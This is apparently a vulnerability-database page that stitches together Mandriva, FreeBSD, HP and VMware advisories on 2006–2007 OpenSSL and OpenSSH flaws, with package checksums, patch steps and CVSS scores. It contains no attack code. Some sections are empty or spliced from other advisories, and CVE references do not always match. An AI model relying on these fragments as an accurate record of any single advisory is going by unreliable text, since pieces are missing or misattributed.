    Mandriva Linux 2006.0/X86_64: 54ed69fc4976d3c0953eeebd3c10471a 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm 632fbe5eaff684ec2f27da4bbe93c4f6 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 04dbe52bda3051101db73fabe687bd7e 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm ca169246cc85db55839b265b90e8c842 2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

    Mandriva Linux 2007.0: db68f8f239604fb76a0a10c70104ef61 2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm a97c6033a33fabcd5509568304b7a988 2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: 1895971ef1221056075c4ee3d4aaac72 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm cfd59201e5e9c436f42b969b4aa567f1 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm 36da85c76eddf95feeb3f4b792528483 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm db68f8f239604fb76a0a10c70104ef61 2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm e3aebeae455a0820c5f28483bd6d3fa5 2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Corporate 3.0: 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 1e7834f6f0fe000f8f00ff49ee6f7ea0 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm 6c86220445ef34c2dadadc3e00701885 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm c25c4042a91b6e7bf9aae1aa2fea32a5 corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 3.0/X86_64: 52dfd4d10e00c9bd0944e4486190de93 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm 258a19afc44dadfaa00d0ebd8b3c0df4 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm cd5cc151e476552be549c6a37b8a71ea corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 492fcc0df9172557a3297d0082321d4d corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 4.0: 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm daa6c3473f59405778dedd02de73fcc9 corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: b5ae71aacd5b99be9e9327d58da29230 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm 89296e03778a198940c1c413e44b9f45 corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm cb17a0d801c1181ab380472b8ffb085e corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 8d9a55afdc6d930916bac00fd4c4739b corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: cd7ad7e95ce17995dfa8129ebe517049 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm 11771240baebdc6687af70a8a0f2ffd2 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm 8f672bc81b9528598a8560d876612bfa mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm 214f857a36e5c3e600671b7291cd08ae mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm bbb299fd643ccbfbdc1a48b12c7005ce mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)

    iD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3 mAaLoEPfjUca1TR98vgpZUU= =Ff9O -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Corrected: 2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE) 2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8) 2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20) 2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE) 2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16) CVE Name: CVE-2007-5135

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . Background

    FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

    II.

    III.

    IV. Workaround

    No workaround is available, but only applications using the SSL_get_shared_ciphers() function are affected. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date.

    2) To patch your present system:

    The following patch have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc

    b) Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    cd /usr/src/secure/lib/libssl

    make obj && make depend && make && make install

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Branch Revision Path


    RELENG_5 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.3 RELENG_5_5 src/UPDATING 1.342.2.35.2.16 src/sys/conf/newvers.sh 1.62.2.21.2.18 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.1.4.2 RELENG_6 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.11 src/sys/conf/newvers.sh 1.69.2.13.2.11 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.1.2.1 RELENG_6_1 src/UPDATING 1.416.2.22.2.22 src/sys/conf/newvers.sh 1.69.2.11.2.22 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.6.2


    VII.


    References: [0] http://www.openssl.org/news/secadv_20060928.txt [1] http://www.openssl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG openpkg@openpkg.org" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c02824490 Version: 1

    HPSBOV02683 SSRT090208 rev.1 - HP Secure Web Server (SWS) for OpenVMS running Apache/PHP, Remote Denial of Service (DoS), Unauthorized Access, Unauthorized Disclosure of Information, Unauthorized Modification

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2011-05-05 Last Updated: 2011-05-05

    Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, unauthorized modification

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP Secure Web Server (SWS) for OpenVMS running Apache and PHP. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, or unauthorized modifications.

    References: CVE-2002-0839, CVE-2002-0840, CVE-2003-0542, CVE-2004-0492, CVE-2005-2491, CVE-2005-3352, CVE-2005-3357, CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-3747, CVE-2006-3918, CVE-2006-4339, CVE-2006-4343, CVE-2007-5000, CVE-2007-6388, CVE-2008-0005, CVE-2009-1891, CVE-2009-3095, CVE-2009-3291, CVE-2009-3292, CVE-2009-3293, CVE-2009-3555, CVE-2010-0010

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier.

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2002-0839 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2002-0840 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2003-0542 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2004-0492 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2005-2491 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2005-3352 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2005-3357 (AV:N/AC:H/Au:N/C:N/I:N/A:C) 5.4 CVE-2006-2937 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2006-2940 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2006-3738 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2006-3747 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2006-3918 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2006-4339 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2006-4343 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2007-5000 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2007-6388 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2008-0005 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2009-1891 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2009-3095 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3291 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3555 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8 CVE-2010-0010 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has made the following software updates available to resolve these vulnerabilities.

    Kit Name Location

    HP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers. http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html

    CSWS_PHP V2.2 http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html

    HISTORY Version:1 (rev.1) - 5 May 2011 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. HP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows.

    BACKGROUND

    RESOLUTION HP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256


                   VMware Security Advisory
    

    Advisory ID: VMSA-2007-0001 Synopsis: VMware ESX server security updates Issue date: 2007-01-08 Updated on: 2007-01-08 CVE: CVE-2006-3589 CVE-2006-2937 CVE-2006-2940 CVE-2006-3738 CVE-2006-4339 CVE-2006-4343 CVE-2006-4980


    1. Summary:

    Updated ESX Patches address several security issues.

    1. Relevant releases:

    VMware ESX 3.0.1 without patch ESX-9986131 VMware ESX 3.0.0 without patch ESX-3069097

    VMware ESX 2.5.4 prior to upgrade patch 3 VMware ESX 2.5.3 prior to upgrade patch 6 VMware ESX 2.1.3 prior to upgrade patch 4 VMware ESX 2.0.2 prior to upgrade patch 4

    1. Problem description:

    Problems addressed by these patches:

    a. Incorrect permissions on SSL key files generated by vmware-config (CVE-2006-3589):

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with the configuration program
    vmware-config which could set incorrect permissions on SSL key
    files. Local users may be able to obtain access to the SSL key
    files. The Common Vulnerabilities and Exposures project
    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue.
    

    b. OpenSSL library vulnerabilities:

    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131
    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d
    allows remote attackers to cause a denial of service (infinite
    loop and memory consumption) via malformed ASN.1 structures that
    trigger an improperly handled error condition.
    
    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,
    and earlier versions allows attackers to cause a denial of service
    (CPU consumption) via parasitic public keys with large (1) "public
    exponent" or (2) "public modulus" values in X.509 certificates that
    require extra time to process when using RSA signature verification.
    
    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8
    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1
    padding before generating a hash, which allows remote attackers to
    forge a PKCS #1 v1.5 signature that is signed by that RSA key and
    prevents OpenSSL from correctly verifying X.509 and other
    certificates that use PKCS #1.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,
    CVE-2006-4339, and CVE-2006-4343 to these issues.
    

    c. Updated OpenSSH package addresses the following possible security issues:

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by Patch ESX-3069097
    ESX 2.5.4: does not have these problems
    ESX 2.5.3: does not have these problems
    ESX 2.1.3: does not have these problems
    ESX 2.0.2: does not have these problems
    
    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly
    other versions, when using privilege separation, does not properly
    signal the non-privileged process when a session has been terminated
    after exceeding the LoginGraceTime setting, which leaves the
    connection open and allows remote attackers to cause a denial of
    service (connection consumption).
    
    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute
    arbitrary commands via filenames that contain shell metacharacters
    or spaces, which are expanded twice.
    
    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host
    access by numeric IP addresses and with VerifyReverseMapping
    disabled, allows remote attackers to bypass "from=" and "user@host"
    address restrictions by connecting to a host from a system whose
    reverse DNS hostname contains the numeric IP address.
    
    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1
    SSH protocol, allows remote attackers to cause a denial of service
    (CPU consumption) via an SSH packet that contains duplicate blocks,
    which is not properly handled by the CRC compensation attack
    detector.
    
    NOTE: ESX by default disables version 1 SSH protocol.
    
    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4
    allows remote attackers to cause a denial of service (crash), and
    possibly execute arbitrary code if GSSAPI authentication is enabled,
    via unspecified vectors that lead to a double-free.
    
    NOTE: ESX doesn't use GSSAPI by default.
    
    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege
    Separation Monitor in OpenSSH before 4.5 causes weaker verification
    that authentication has been successful, which might allow attackers
    to bypass authentication.
    
    NOTE: as of 20061108, it is believed that this issue is only
    exploitable by leveraging vulnerabilities in the unprivileged
    process, which are not known to exist.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,
    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues.
    

    d. Object reuse problems with newly created virtual disk (.vmdk or .dsk) files:

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with virtual disk (.vmdk or .dsk) files
    that are newly created, but contain blocks from recently deleted
    virtual disk files.  Information belonging to the previously
    deleted virtual disk files could be revealed in newly created
    virtual disk files.
    
    VMware recommends the following workaround: When creating new
    virtual machines on an ESX Server that may contain sensitive
    data, use vmkfstools with the -W option. This initializes the
    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w.
    

    e. Buffer overflow in Python function repr():

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by ESX-3069097
    ESX 2.5.4: does not have this problem
    ESX 2.5.3: does not have this problem
    ESX 2.1.3: does not have this problem
    ESX 2.0.2: does not have this problem
    
    A possible security issue with how the Python function repr()
    function handles UTF-32/UCS-4 strings.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the name CVE-2006-4980 to this issue.
    
    1. Solution:

    Please review the Patch notes for your version of ESX and verify the md5sum.

    ESX 3.0.1 http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html md5usm: 239375e107fd4c7af57663f023863fcb

    ESX 3.0.0 http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html md5sum: ca9947239fffda708f2c94f519df33dc

    ESX 2.5.4 http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html md5sum: 239375e107fd4c7af57663f023863fcb

    ESX 2.5.3 http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html md5sum: f90fcab28362edbf2311f3ca90cc7739

    ESX 2.1.3 http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f

    ESX 2.0.2 http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html md5sum: 925e70f28d17714c53fdbd24de64329f

    1. References:

    ESX 3.0.0 Patch URL: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html Knowledge base URL: http://kb.vmware.com/kb/3069097

    ESX 3.0.1 Patch URL: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html Knowledge base URL: http://kb.vmware.com/kb/9986131

    ESX 2.5.4 Patch URL: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html

    ESX 2.5.3 Patch URL: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html

    ESX 2.1.3 Patch URL: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html

    ESX 2.0.2 Patch URL: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980

    1. Contact:

    http://www.vmware.com/security

    VMware Security Response Policy http://www.vmware.com/vmtn/technology/security/security_response.html

    E-mail: security@vmware.com

    Copyright 2007 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE neFG0RikD74TCYeXKW6CBy4= =9/6k -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 3.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
